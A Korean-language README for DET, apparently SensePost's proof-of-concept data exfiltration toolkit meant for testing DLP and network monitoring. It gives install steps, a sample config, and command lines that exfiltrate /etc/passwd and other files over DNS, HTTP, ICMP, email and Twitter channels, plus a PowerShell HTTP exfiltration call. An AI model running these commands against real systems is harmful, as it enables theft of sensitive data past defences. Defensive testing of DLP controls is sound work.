
(확장 가능한) 데이터 유출 도구 키트 (DET)
=======
DET (있는 그대로 제공됨)는 단일 또는 여러 채널을 동시에 사용하여 데이터 유출을 수행하는 개념 증명입니다.
이것은 가능한 DLP 실패를 식별하기 위한 개념 증명입니다. 이 도구는 절대 민감한/실제 데이터를 유출하는 데 사용되어서는 안 됩니다 (예: 평가에서).
아이디어는 다양한 데이터 유출 기술에 대해 구현된 네트워크 모니터링 및 데이터 유출 방지(DLP) 솔루션 구성을 테스트하기 위해 모든 종류의 프로토콜/서비스를 연결할 수 있는 일반적인 툴킷을 만드는 것이었습니다.
기본 저장소는 이제 여기로 이동했습니다.
DET는 2016년 3월 9일 BSides Ljubljana에서 발표되었으며 슬라이드는 여기에서 확인할 수 있습니다. 슬라이드는 여기에서 확인할 수 있습니다.
저장소를 클론합니다:
git clone https://github.com/sensepost/DET.git
그런 다음:
pip install -r requirements.txt --user
DET를 사용하려면 구성하고 적절한 설정(예: SMTP/IMAP, AES256 암호화 암호 등)을 추가해야 합니다. 구성 예제 파일이 제공되며 이름은 config-sample.json입니다.
{
"plugins": {
"http": {
"target": "192.168.1.101",
"port": 8080
},
"google_docs": {
"target": "192.168.1.101",
"port": 8080,
},
"dns": {
"key": "google.com",
"target": "192.168.1.101",
"port": 53
},
"gmail": {
"username": "[email protected]",
"password": "ReallyStrongPassword",
"server": "smtp.gmail.com",
"port": 587
},
"tcp": {
"target": "192.168.1.101",
"port": 6969
},
"udp": {
"target": "192.168.1.101",
"port": 6969
},
"twitter": {
"username": "PaulWebSec",
"CONSUMER_TOKEN": "XXXXXXXXX",
"CONSUMER_SECRET": "XXXXXXXXX",
"ACCESS_TOKEN": "XXXXXXXXX",
"ACCESS_TOKEN_SECRET": "XXXXXXXXX"
},
"icmp": {
"target": "192.168.1.101"
}
},
"AES_KEY": "THISISACRAZYKEY",
"sleep_time": 10
}
python det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
[-L]
Data Exfiltration Toolkit (SensePost)
optional arguments:
-h, --help show this help message and exit
-c CONFIG Configuration file (eg. '-c ./config-sample.json')
-f FILE File to exfiltrate (eg. '-f /etc/passwd')
-d FOLDER Folder to exfiltrate (eg. '-d /etc/')
-p PLUGIN Plugins to use (eg. '-p dns,twitter')
-e EXCLUDE Plugins to exclude (eg. '-e gmail,icmp')
-L Server mode
모든 플러그인을 로드하려면:
python det.py -L -c ./config.json
트위터와 지메일 모듈만 로드하려면:
python det.py -L -c ./config.json -p twitter,gmail
모든 플러그인을 로드하고 DNS를 제외하려면:
python det.py -L -c ./config.json -e dns
모든 플러그인을 로드하려면:
python det.py -c ./config.json -f /etc/passwd
트위터와 지메일 모듈만 로드하려면:
python det.py -c ./config.json -p twitter,gmail -f /etc/passwd
모든 플러그인을 로드하고 DNS를 제외하려면:
python det.py -c ./config.json -e dns -f /etc/passwd
PowerShell에서 (HTTP 모듈):
PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'
현재 DET는 여러 프로토콜을 지원하며, 다음과 같습니다:
그리고 기타 '서비스':
현재 곧 출시될 새로운 모듈을 구현 중이며, 다음을 포함합니다:
제가 영감을 받은 프로젝트들의 멋진 참고 자료/크레딧입니다:
트위터 @PaulWebSec로 연락하실 수 있습니다. 기여하고 싶다면 자유롭게 클론, 포크, PR 제출 등을 해주세요.
DET는 MIT 라이선스에 따라 라이선스가 부여됩니다. 이 라이선스의 범위를 넘는 권한은 [email protected]에서 확인할 수 있습니다.